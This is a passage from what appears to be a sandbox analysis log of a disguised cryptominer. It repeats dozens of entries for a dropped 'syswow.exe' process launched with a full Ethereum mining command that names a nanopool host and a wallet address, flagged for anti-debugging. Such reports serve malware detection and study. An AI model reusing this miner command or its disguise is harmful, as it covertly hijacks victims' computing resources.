                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4200
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5644
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4760
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:2200
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:188
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:6200
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:2676
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5492
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4980
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4336
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4996
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5364
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:340
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5980
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:4776
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:6640
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:3304
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5752
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:5412
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:7140
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:6728
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:6732
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:3752
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:7016
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:6344
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:6700
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:6684
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5992
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:7064
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4112
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:6664
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2872
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:4828
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:6188
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:6316
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:2992
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:4532
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:2184
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:5716
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:6508
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:5972
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:6420
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:7032
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:6656
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:356
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:4740
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:5128
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:3496
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
